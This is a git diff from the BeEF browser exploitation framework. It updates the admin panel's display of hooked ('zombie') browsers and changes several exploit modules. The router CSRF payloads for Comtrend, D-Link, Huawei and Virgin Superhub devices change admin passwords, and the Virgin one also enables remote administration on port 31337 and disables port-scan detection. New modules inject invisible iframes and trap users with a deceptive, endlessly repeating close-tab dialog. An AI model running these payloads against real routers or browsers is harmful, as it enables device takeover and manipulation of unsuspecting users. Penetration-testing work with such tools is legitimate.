diff --git a/extensions/admin_ui/media/images/icons/iphone.jpg b/extensions/admin_ui/media/images/icons/iphone.jpg
new file mode 100644
index 000000000..134b5c9f9
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/iphone.jpg differ
diff --git a/extensions/admin_ui/media/images/icons/iphone.png b/extensions/admin_ui/media/images/icons/iphone.png
deleted file mode 100644
index ab4a8cc31..000000000
Binary files a/extensions/admin_ui/media/images/icons/iphone.png and /dev/null differ
diff --git a/extensions/admin_ui/media/images/icons/kindle.png b/extensions/admin_ui/media/images/icons/kindle.png
new file mode 100644
index 000000000..b858fc003
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/kindle.png differ
diff --git a/extensions/admin_ui/media/images/icons/motorola.png b/extensions/admin_ui/media/images/icons/motorola.png
new file mode 100644
index 000000000..fee6d6e65
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/motorola.png differ
diff --git a/extensions/admin_ui/media/images/icons/nexus.png b/extensions/admin_ui/media/images/icons/nexus.png
new file mode 100644
index 000000000..16ffc743b
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/nexus.png differ
diff --git a/extensions/admin_ui/media/images/icons/nokia.ico b/extensions/admin_ui/media/images/icons/nokia.ico
new file mode 100644
index 000000000..fe5497301
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/nokia.ico differ
diff --git a/extensions/admin_ui/media/images/icons/pc.png b/extensions/admin_ui/media/images/icons/pc.png
new file mode 100644
index 000000000..d8f38aca7
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/pc.png differ
diff --git a/extensions/admin_ui/media/images/icons/sony_ericsson.png b/extensions/admin_ui/media/images/icons/sony_ericsson.png
new file mode 100644
index 000000000..1dab4a8d2
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/sony_ericsson.png differ
diff --git a/extensions/admin_ui/media/images/icons/webos.png b/extensions/admin_ui/media/images/icons/webos.png
new file mode 100644
index 000000000..d5c0b70d7
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/webos.png differ
diff --git a/extensions/admin_ui/media/images/icons/zune.gif b/extensions/admin_ui/media/images/icons/zune.gif
new file mode 100644
index 000000000..6d8259b13
Binary files /dev/null and b/extensions/admin_ui/media/images/icons/zune.gif differ
diff --git a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
index c764f94cf..347f7b97d 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
@@ -20,18 +20,49 @@ var ZombiesMgr = function(zombies_tree_lists) {
// this is a helper class to create a zombie object from a JSON hash index
this.zombieFactory = function(index, zombie_array){
- text = "![](/ui/media/images/icons/"+escape(zombie_array[index]["browser_icon"])+")
";
- text += "![](/ui/media/images/icons/"+escape(zombie_array[index]["os_icon"])+")
";
- text += zombie_array[index]["ip"];
+
+ var ip = zombie_array[index]["ip"];
+ var session = zombie_array[index]["session"];
+ var browser_name = zombie_array[index]["browser_name"];
+ var browser_version = zombie_array[index]["browser_version"];
+ var browser_icon = zombie_array[index]["browser_icon"];
+ var os_icon = zombie_array[index]["os_icon"];
+ var os_name = zombie_array[index]["os_name"];
+ var hw_name = zombie_array[index]["hw_name"];
+ var hw_icon = zombie_array[index]["hw_icon"];
+ var domain = zombie_array[index]["domain"];
+ var port = zombie_array[index]["port"];
+ var has_flash = zombie_array[index]["has_flash"];
+ var has_web_sockets = zombie_array[index]["has_web_sockets"];
+ var has_googlegears = zombie_array[index]["has_googlegears"];
+ var has_java = zombie_array[index]["has_java"];
+ var date_stamp = zombie_array[index]["date_stamp"];
+
+ text = "![](/ui/media/images/icons/"+escape(browser_icon)+")
";
+ text+= "![](/ui/media/images/icons/"+escape(os_icon)+")
";
+ text+= "![](/ui/media/images/icons/"+escape(hw_icon)+")
";
+ text+= ip;
+
+ balloon_text = "IP: " + ip;
+ balloon_text+= "
Browser: " + browser_name + " " + browser_version;
+ balloon_text+= "
System: " + os_name;
+ balloon_text+= "
Hardware: " + hw_name;
+ balloon_text+= "
Domain: " + domain + ":" + port;
+ balloon_text+= "
Flash: " + has_flash;
+ balloon_text+= "
Java: " + has_java;
+ balloon_text+= "
Web Sockets: " + has_web_sockets;
+ balloon_text+= "
Google Gears: " + has_googlegears;
+ balloon_text+= "
Date: " + date_stamp;
var new_zombie = {
- 'id' : index,
- 'ip' : zombie_array[index]["ip"],
- 'session' : zombie_array[index]["session"],
- 'text': text,
- 'check' : false,
- 'domain' : zombie_array[index]["domain"],
- 'port' : zombie_array[index]["port"]
+ 'id' : index,
+ 'ip' : ip,
+ 'session' : session,
+ 'text' : text,
+ 'balloon_text' : balloon_text,
+ 'check' : false,
+ 'domain' : domain,
+ 'port' : port
};
return new_zombie;
diff --git a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
index 247a44fe9..aa04f300f 100644
--- a/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
+++ b/extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
@@ -196,7 +196,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
var exists = this.getNodeById(hb_id);
if(exists) return;
- hooked_browser.qtip = hooked_browser.text + ' hooked on ' + hooked_browser.domain + ":" + hooked_browser.port;
+ hooked_browser.qtip = hooked_browser.balloon_text;
//save a new online HB
if(online && Ext.pluck(this.online_hooked_browsers_array, 'session').indexOf(hooked_browser.session)==-1) {
@@ -220,7 +220,7 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
//creates a new node for that hooked browser
node = new Ext.tree.TreeNode(hooked_browser);
-
+
//creates a sub-branch for that HB if necessary
mother_node = this.addSubFolder(mother_node, hooked_browser[this.tree_configuration['sub-branch']], checkbox);
diff --git a/extensions/console/lib/shellinterface.rb b/extensions/console/lib/shellinterface.rb
index a896184cb..f810c042e 100644
--- a/extensions/console/lib/shellinterface.rb
+++ b/extensions/console/lib/shellinterface.rb
@@ -358,6 +358,21 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
+ # set and add the return values for the os name
+ hw_name = BD.get(self.targetsession, 'Hardware')
+ if not hw_name.nil?
+ encoded_hw_name = CGI.escapeHTML(hw_name)
+ encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
+
+ page_name_row = {
+ 'category' => 'Host',
+ 'data' => encoded_hw_name_hash,
+ 'from' => 'Initialization'
+ }
+
+ summary_grid_hash['results'].push(page_name_row) # add the row
+ end
+
# set and add the return values for the browser name
browser_name = BD.get(self.targetsession, 'BrowserName')
if not browser_name.nil?
@@ -535,6 +550,21 @@ class ShellInterface
summary_grid_hash['results'].push(page_name_row) # add the row
end
+ # set and add the yes|no value for HasPhonegap
+ has_phonegap = BD.get(self.targetsession, 'HasPhonegap')
+ if not has_phonegap.nil?
+ encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
+ encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
+
+ page_name_row = {
+ 'category' => 'Browser',
+ 'data' => encoded_has_phonegap_hash,
+ 'from' => 'Initialization'
+ }
+
+ summary_grid_hash['results'].push(page_name_row) # add the row
+ end
+
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(self.targetsession, 'HasGoogleGears')
if not has_googlegears.nil?
diff --git a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
index b4a20fe33..3aa49f32f 100644
--- a/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
+++ b/modules/browser/hooked_domain/mobilesafari_address_spoofing/config.yaml
@@ -24,7 +24,7 @@ beef:
target:
working:
S:
- os: ["iPhone"]
+ os: ["iOS"]
not_working:
ALL:
os: ["All"]
diff --git a/modules/exploits/router/comtrend_ct5367_csrf/command.js b/modules/exploits/router/comtrend_ct5367_csrf/command.js
index fdbedec46..d713b6b06 100644
--- a/modules/exploits/router/comtrend_ct5367_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5367_csrf/command.js
@@ -18,12 +18,12 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
- ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+ ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
- form.setAttribute('action', gateway + "/password.cgi");
+ form.setAttribute('action', gateway + "password.cgi");
form.setAttribute('method', 'post');
var input = null;
diff --git a/modules/exploits/router/comtrend_ct5624_csrf/command.js b/modules/exploits/router/comtrend_ct5624_csrf/command.js
index b6cc7ab28..afe248983 100644
--- a/modules/exploits/router/comtrend_ct5624_csrf/command.js
+++ b/modules/exploits/router/comtrend_ct5624_csrf/command.js
@@ -18,7 +18,7 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var ct5367_iframe1 = beef.dom.createInvisibleIframe();
- ct5367_iframe1.setAttribute('src', gateway+'/scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
+ ct5367_iframe1.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');
var ct5367_iframe2 = beef.dom.createInvisibleIframe();
ct5367_iframe2.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);
diff --git a/modules/exploits/router/dlink_dsl500t_csrf/command.js b/modules/exploits/router/dlink_dsl500t_csrf/command.js
index ae1c98e23..f25c89a5b 100644
--- a/modules/exploits/router/dlink_dsl500t_csrf/command.js
+++ b/modules/exploits/router/dlink_dsl500t_csrf/command.js
@@ -17,7 +17,7 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
- var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "/cgi-bin/webcm", "POST",
+ var dsl500t_iframe = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST",
[{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
{'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
{'type':'hidden', 'name':'security:settings/password', 'value':passwd},
diff --git a/modules/exploits/router/huawei_smartax_mt880/command.js b/modules/exploits/router/huawei_smartax_mt880/command.js
index a749117a8..bfe98e957 100644
--- a/modules/exploits/router/huawei_smartax_mt880/command.js
+++ b/modules/exploits/router/huawei_smartax_mt880/command.js
@@ -19,7 +19,7 @@ beef.execute(function() {
var passwd = '<%= @password %>';
var huawei_smartax_mt880_iframe = beef.dom.createInvisibleIframe();
- huawei_smartax_mt880_iframe.setAttribute('src', gateway+"/Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
+ huawei_smartax_mt880_iframe.setAttribute('src', gateway+"Action?user_id="+username+"&priv=1&pass1="+passwd+"&pass2="+passwd+"&id=70");
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
diff --git a/modules/exploits/router/virgin_superhub_csrf/command.js b/modules/exploits/router/virgin_superhub_csrf/command.js
index 5acb91421..fb0ed4ca4 100644
--- a/modules/exploits/router/virgin_superhub_csrf/command.js
+++ b/modules/exploits/router/virgin_superhub_csrf/command.js
@@ -17,17 +17,29 @@ beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
+ var port = '<%= @port %>';
- var virgin_superhub_iframe = beef.dom.createIframeXsrfForm(gateway + "/goform/RgSecurity", "POST", [
- {'type':'hidden', 'name':'NetgearPassword', 'value':passwd} ,
+ var virgin_superhub_iframe1 = beef.dom.createIframeXsrfForm(gateway + "goform/RgSecurity", "POST", [
+ {'type':'hidden', 'name':'NetgearPassword', 'value':passwd},
{'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd},
{'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'}
]);
+ var virgin_superhub_iframe2 = beef.dom.createIframeXsrfForm(gateway + "goform/RgServices", "POST", [
+ {'type':'hidden', 'name':'cbPortScanDetection', 'value':''}
+ ]);
+
+ var virgin_superhub_iframe3 = beef.dom.createIframeXsrfForm(gateway + "goform/RgVMRemoteManagementRes", "POST", [
+ {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'},
+ {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port}
+ ]);
+
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
- document.body.removeChild(virgin_superhub_iframe);
+ document.body.removeChild(virgin_superhub_iframe1);
+ document.body.removeChild(virgin_superhub_iframe2);
+ document.body.removeChild(virgin_superhub_iframe3);
}
setTimeout("cleanup()", 15000);
diff --git a/modules/exploits/router/virgin_superhub_csrf/config.yaml b/modules/exploits/router/virgin_superhub_csrf/config.yaml
index 11c11a548..e767d9fef 100644
--- a/modules/exploits/router/virgin_superhub_csrf/config.yaml
+++ b/modules/exploits/router/virgin_superhub_csrf/config.yaml
@@ -19,7 +19,7 @@ beef:
enable: true
category: ["Exploits", "Router"]
name: "Virgin Superhub CSRF"
- description: "Attempts to change the admin password on a Virgin Superhub router."
- authors: ["bcoles"]
+ description: "Attempts to enable remote administration, disable the firewall, and change the admin password on a Virgin Superhub router."
+ authors: ["bcoles", "n0x00"]
target:
working: ["ALL"]
diff --git a/modules/exploits/router/virgin_superhub_csrf/module.rb b/modules/exploits/router/virgin_superhub_csrf/module.rb
index 8a2e5a2d1..83599490c 100644
--- a/modules/exploits/router/virgin_superhub_csrf/module.rb
+++ b/modules/exploits/router/virgin_superhub_csrf/module.rb
@@ -17,8 +17,9 @@ class Virgin_superhub_csrf < BeEF::Core::Command
def self.options
return [
- {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.254/'},
- {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.100.1/'},
+ {'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'},
+ {'name' => 'port', 'ui_label' => 'Desired port', 'value' => '31337'}
]
end
diff --git a/modules/host/detect_google_desktop/config.yaml b/modules/host/detect_google_desktop/config.yaml
index 4a0d23f18..ba611bf45 100644
--- a/modules/host/detect_google_desktop/config.yaml
+++ b/modules/host/detect_google_desktop/config.yaml
@@ -24,5 +24,5 @@ beef:
target:
not_working:
ALL:
- os: ["iPhone"]
+ os: ["iOS"]
working: ["ALL"]
diff --git a/modules/host/get_system_info/config.yaml b/modules/host/get_system_info/config.yaml
index 802db1695..7902a2381 100644
--- a/modules/host/get_system_info/config.yaml
+++ b/modules/host/get_system_info/config.yaml
@@ -24,6 +24,6 @@ beef:
target:
not_working:
ALL:
- os: ["iPhone", "Macintosh"]
+ os: ["iOS", "Macintosh"]
working: ["O", "FF", "S", "IE"]
user_notify: ["C"]
diff --git a/modules/host/hook_default_browser/config.yaml b/modules/host/hook_default_browser/config.yaml
index 0033717ba..56c276653 100644
--- a/modules/host/hook_default_browser/config.yaml
+++ b/modules/host/hook_default_browser/config.yaml
@@ -24,6 +24,6 @@ beef:
target:
not_working:
ALL:
- os: ["iPhone"]
+ os: ["iOS"]
working: ["All"]
user_notify: ["FF", "C"]
diff --git a/modules/host/iphone_tel/config.yaml b/modules/host/iphone_tel/config.yaml
index d3bb15769..783637ed4 100644
--- a/modules/host/iphone_tel/config.yaml
+++ b/modules/host/iphone_tel/config.yaml
@@ -24,7 +24,7 @@ beef:
target:
user_notify:
S:
- os: ["iPhone"]
+ os: ["iOS"]
not_working:
ALL:
os: ["All"]
diff --git a/modules/misc/invisible_iframe/command.js b/modules/misc/invisible_iframe/command.js
new file mode 100644
index 000000000..a0763583c
--- /dev/null
+++ b/modules/misc/invisible_iframe/command.js
@@ -0,0 +1,24 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var target = "<%= @target %>";
+ var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
+ iframe_<%= @command_id %>.setAttribute('src', target);
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=IFrame created');
+
+});
diff --git a/modules/misc/invisible_iframe/config.yaml b/modules/misc/invisible_iframe/config.yaml
new file mode 100644
index 000000000..b391c048a
--- /dev/null
+++ b/modules/misc/invisible_iframe/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ invisible_iframe:
+ enable: true
+ category: "Misc"
+ name: "Create Invisible Iframe"
+ description: "Creates an invisible iframe."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/misc/invisible_iframe/module.rb b/modules/misc/invisible_iframe/module.rb
new file mode 100644
index 000000000..1bfb45b60
--- /dev/null
+++ b/modules/misc/invisible_iframe/module.rb
@@ -0,0 +1,28 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Invisible_iframe < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'target', 'ui_label' => 'URL', 'value' => 'http://beefproject.com/'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml
index 4c44194e1..d6b2c0be4 100644
--- a/modules/misc/local_file_theft/config.yaml
+++ b/modules/misc/local_file_theft/config.yaml
@@ -23,7 +23,7 @@ beef:
enable: true
category: "Misc"
name: "Local File Theft"
- description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme. This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in safari from the your localfile system."
+ description: "JavaScript may have filesystem access if we are running from a local resource and using the file:// scheme.
This module checks common locations and cheekily snaches anything it finds. Shamelessly plagurised from http://kos.io/xsspwn. To test this module save the BeEF hook page locally and open in Safari from the your localfile system."
authors: ["mh"]
target:
- working: ["All"]
+ working: ["S"]
diff --git a/modules/persistence/confirm_close_tab/command.js b/modules/persistence/confirm_close_tab/command.js
new file mode 100644
index 000000000..1609bcab7
--- /dev/null
+++ b/modules/persistence/confirm_close_tab/command.js
@@ -0,0 +1,45 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ function display_confirm(){
+ if(confirm("Are you sure you want to navigate away from this page?\n\n There is currently a request to the server pending. You will lose recent changes by navigating away.\n\n Press OK to continue, or Cancel to stay on the current page.")){
+ display_confirm();
+ }
+ }
+
+ function dontleave(e){
+ e = e || window.event;
+
+ if(beef.browser.isIE()){
+ e.cancelBubble = true;
+ e.returnValue = "There is currently a request to the server pending. You will lose recent changes by navigating away.";
+ }else{
+ if (e.stopPropagation) {
+ e.stopPropagation();
+ e.preventDefault();
+ }
+ }
+
+ //re-display the confirm dialog if the user clicks OK (to leave the page)
+ display_confirm();
+ return "There is currently a request to the server pending. You will lose recent changes by navigating away.";
+ }
+
+ window.onbeforeunload = dontleave;
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'Module executed successfully');
+});
diff --git a/modules/persistence/confirm_close_tab/config.yaml b/modules/persistence/confirm_close_tab/config.yaml
new file mode 100644
index 000000000..62bcd36e6
--- /dev/null
+++ b/modules/persistence/confirm_close_tab/config.yaml
@@ -0,0 +1,26 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ confirm_close_tab:
+ enable: true
+ category: "Persistence"
+ name: "Confirm Close Tab"
+ description: "Shows a confirm dialog to the user when he tries to close a tab. If he click yes, re-display the confirm dialog. Doesn't work on Opera < 12"
+ authors: ["antisnatchor"]
+ target:
+ user_notify: ["ALL"]
+ not_working: ["O"]
\ No newline at end of file
diff --git a/modules/persistence/confirm_close_tab/module.rb b/modules/persistence/confirm_close_tab/module.rb
new file mode 100644
index 000000000..e38abbfd5
--- /dev/null
+++ b/modules/persistence/confirm_close_tab/module.rb
@@ -0,0 +1,22 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Confirm_close_tab < BeEF::Core::Command
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end